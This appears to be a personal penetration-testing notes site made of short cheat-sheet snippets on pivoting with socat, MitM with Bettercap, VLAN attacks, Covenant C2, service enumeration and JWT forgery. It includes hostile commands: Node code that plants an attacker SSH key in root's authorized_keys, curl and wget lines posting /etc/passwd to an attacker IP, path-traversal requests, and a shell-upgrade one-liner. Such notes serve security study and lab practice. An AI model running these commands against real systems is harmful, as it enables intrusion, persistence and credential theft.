akde/infosec

Information security is ultimately about managing risk


  • Socat If Socat is not on the tar­get sys­tem, upload a sta­t­ic bina­ry. This will lis­ten to port 5555 and for­ward it to the giv­en IP on the giv­en port deep­er in the tar­get’s network: socat -ddd TCP-LISTEN:5555,reuseaddr,fork TCP:10.4.247.215:5432 Proxychains ! If prox­y­chains is slow, espe­cial­ly while port scan­ning, try to reduce the fol­low­ing parameters:…


  • This is an overview blog post. MitM Etter­cap Bet­ter­cap L2 Scapy L2 mit­m­dump L3 Loki Var­i­ous VLAN attacks NAC Net­work admis­sion control Oth­er tools and notes: Use http_hijack.py in the P151 script direc­to­ry) to quick­ly set up a MitM. Check if you can See OSPF pack­ets. Inspect then in Wire­shark for the Auth Type field. If this is…


  • Net­work pack­et manip­u­la­tion shell and library for Python. (Github)


  • A Etter­cap suc­ces­sor, writ­ten in Go. Basic commands: Pas­sive ARP probing:  net.recon on net.recon off Active prob­ing: net.probe on net.probe off Sniff­ing: set net.sniff.output /tmp/sniff.pcap // optional net.sniff on net.sniff off Spoof­ing: set arp.spoof.targets $target1, $target2, $target3 arp.spoof on arp.spoof off DNS Spoof­ing: set dns.spoof.domains target.domain // the domain which should be resolved as… set…


  • Def­i­n­i­tions: A trunk con­nec­tion is a con­nec­tion between two switches. Tools Yersinia is a lay­er 2 mod­i­fi­ca­tion framework. VoIPHop­per is a sim­ple tool which can sniff VoIP traf­fic and out­put the VLAN ID from the VoIP net­work:voiphopper -c 0 -i eth0 Enumerate existing VLANs Start Yersiniayersinia -I Press g Select DTP Press 5 to see…


  • Cau­tion: Don’t change the MAC address via a remote ses­sion because of reasons… Linux ifconfig eth0 ether 00:01:02:03:04:05 Mac ifconfig en0 ether 00:01:02:03:04:05 Windows mac­shift e.g.


  • Tech­niques which decides if a new device can join the nor­mal or a spe­cial network. A cap­tive por­tal forces a client to an authen­ti­ca­tion page. After authen­ti­ca­tion in a nor­mal low-secu­ri­ty envi­ron­ment (where you can­not assume pre­con­fig­ured sys­tems) the authen­ti­ca­tion is usu­al­ly grant­ed to a com­bi­na­tion of MAC and IP. There­fore, try to sniff valid…


  • -NET attack frame­work: https://github.com/cobbr/Covenant Usage Cre­ate a lis­ten­er on the attack system. Add a launch­er to the listener. The attack sys­tem now pro­vides a pay­load file the vic­tim has to start. You can use Urban­Bish­op to inject the pay­load into a run­ning process. As soon as the pay­load is exe­cut­ed, Covenant will show on the dash­board…


  • Exe­cute command: const { exec } = require("child_process"); exec(“echo ‘ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDHGb9AwdEdyFm6SBuQeCWyKMh+CRXlMMb4l1GKlB8rnWoIzVClRfeWZnYzkBG487Mhb3svrd/ouVpXKWsFiAFSl5OJie88WJGTWc+3sU3I/TvuTbDgrqWwUMpPZj0jYgq99iaQeJDNPjKTs3w0QEq7GT1q69DU3m1jDCggdHYzMMA8byVXpCUivN1o4tkABhqSeUeZgW2Q9n2NxKkHGNvbkAoutFho1g8azgvnHI9HOExd81ppdzuAVC/YOTRtUKIB3ZNnfYS1qE7xp4fn7a/BEA+N8Axl0aaXLVLi2/RI+nwotdDb/vDXotS2X6B781xE9JboCRvJzejACszlMcI3bPq+R6UY3XILHDl3jpY70IFrpmX/aeUZ4d8m6A79EwyaQuckyU5eTVx7BH/RwH7hmtd7DR6VcxqNzteI49Yq8HwpyBU62I2AmnMuEXEvcPQLiM4947I3pxyZkYtZ5kULcXuWTMOITvPrFNuzwwPW1x3NbR+EnSbLtk8Ybr5iDyM= root@imac2019-kali’ > /root/.ssh/authorized_keys”, (error, std­out, stderr) => {    if (error) {        console.log(‘error: ${error.message}‘);        return;    }    if (stderr) {        console.log(‘stderr: ${stderr}‘);        return;    }    console.log(‘stdout: ${std­out}‘);});


  • Write into a file: curl $url -o /tmp/f.txtcurl $url --output /tmp/f.txtcurl $url > /tmp/f.txt Post a local file: curl -X POST --data-binary @/etc/passwd http://192.168.49.53:21/ Exe­cute com­mand and return the result: curl -d q=`id` http://localhost:21/ With a header curl --header "Host: localhost" 10.10.10.10 Use the cor­rect path also with ../ (use­full for file tra­ver­sion attacks): curl --path-as-is $target:$port/public/../../../etc/passwd


  • A Mes­sage bro­ker, writ­ten in Erlang. Uses the Erlang Cow­boy webserver. Notes Default cre­den­tials: guest / guest (works per defalt only from localhost) User­name can be changed with­out the old pass­word on the com­mand line?!rabbitmqctl change_password username newpassword Files with suf­fix .DCD con­tain credentials. If you have the Erlang cook­ie:erl -cookie JPCGJCAEWHPKKPBXBYYB -name rabbit -sname…


  • Erlang Port Map­per Daemon Enumeration Mandatory Check if epmd is run­ningecho -n -e "\x00\x01\x6e" | nc -vn $target 4369 Check with nmapnmap -sV -Pn -n -T4 -p 4369 --script epmd-info $target Brute force the key with https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/ and try the RCE.


  • List­ing of all files from a Xampp for Win­dows 7.4.6 installation. Look into phpin­fo page — could reveals usernames.


  • Post files wget --post-file=/etc/passwd http://$attacker_ip/ Set out­put file: wget -O /tmp/s http://...


  • Use https://jwt.io/ to decode JWT  It also shows the var­i­ous parts. A JWT token has mul­ti­ple parts in base64, sep­a­rat­ed by a point character. Create JWT token Cre­ate PEM SSH key: openssl genrsa -out private.pem 2048 Cre­ate base64 from head­er and payload: $ echo -n '{"typ":"JWT","alg":"RS256","kid":"http://10.10.14.17/private.pem"}' | base64 -w0 | sed s/+/-/ | sed -E s/=+$// =>…


  • Exam­ple of a connection: openssl s_client -connect $target:995 -crlf -quiet Issues The fol­low­ing mes­sage means that the serv­er and client could not agree on a shared cryp­to sys­tem; prob­a­bly because the server’s cryp­to is too old. 139763095926080:error:1425F102:SSL routines:ssl_choose_client_version:unsupported protocol:../ssl/statem/statem_lib.c:1957: Add TLS 1 support: openssl s_client -connect $target:995 -crlf -quiet -tls1


  • Enumeration Mandatory Try to connect:  Start the con­sole:/opt/mysql-shell-8.0.23-linux-glibc2.12-x86-64bit/bin# ./mysqlsh Try to con­nect with default cre­den­tials or found ones:MySQL JS > var test_conn = require('mysqlx');MySQL JS > var session = mysqlx.getSession({host: '192.168.156.58', user: 'root', password: 'root', port: 33060});


  • Enumeration Mandatory Check CVE-2020–11651 Note that exe­cu­tion of sched­uled tasks can take 5–10 minutes.


  • Enumeration Try to just login. Per default, no user is required.mongodb $target Enu­mer­ate with NSE scriptsnmap -sV --script "mongo* and default" -p 27017 $target Try to con­nectmongo 'mongodb://nodebb:nodebb@192.168.91.69:27017/nodebb' Optional Try https://github.com/codingo/NoSQLMap


  • Enumeration Code execution I am stuck


About

Personal collection of some infosec stuff. Primary purpose of this site is to collect and organize for myself.

Note: Some content is not publicly visible due to copyright issues. Therefore, some links could be broken.

Checklists

Categories

Checklists: Ports

python -c 'import pty;pty.spawn("/bin/bash")';

python3 -c 'import pty;pty.spawn("/bin/bash")';